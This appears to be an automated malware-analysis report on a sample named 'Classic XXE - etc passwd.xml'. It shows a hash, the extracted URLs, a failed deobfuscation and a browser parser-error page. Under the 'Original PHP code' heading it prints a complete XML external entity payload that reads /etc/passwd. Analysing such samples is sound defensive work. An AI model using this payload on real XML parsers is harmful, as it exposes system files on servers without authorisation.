PHP Malware Analysis

Classic XXE - etc passwd.xml

md5: 45cfd8c1ce622ef7cc7fe463a3c00622

Attributes

URLs
  • file:///etc/passwd (Original)
  • http://www.w3.org/1999/xhtml (HTML)


Deobfuscated PHP code

Failed to deobfuscate code

Execution traces


Generated HTML code

<html xmlns="http://www.w3.org/1999/xhtml"><body><parsererror style="display: block; white-space: pre; border: 2px solid #c77; padding: 0 1em 0 1em; margin: 1em; background-color: #fdd; color: black"><h3>This page contains the following errors:</h3><div style="font-family:monospace;font-size:12px">error on line 3 at column 17: ContentDecl : Name or '(' expected
</div><h3>Below is a rendering of the page up to the first error.</h3></parsererror></body></html>

Original PHP code

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>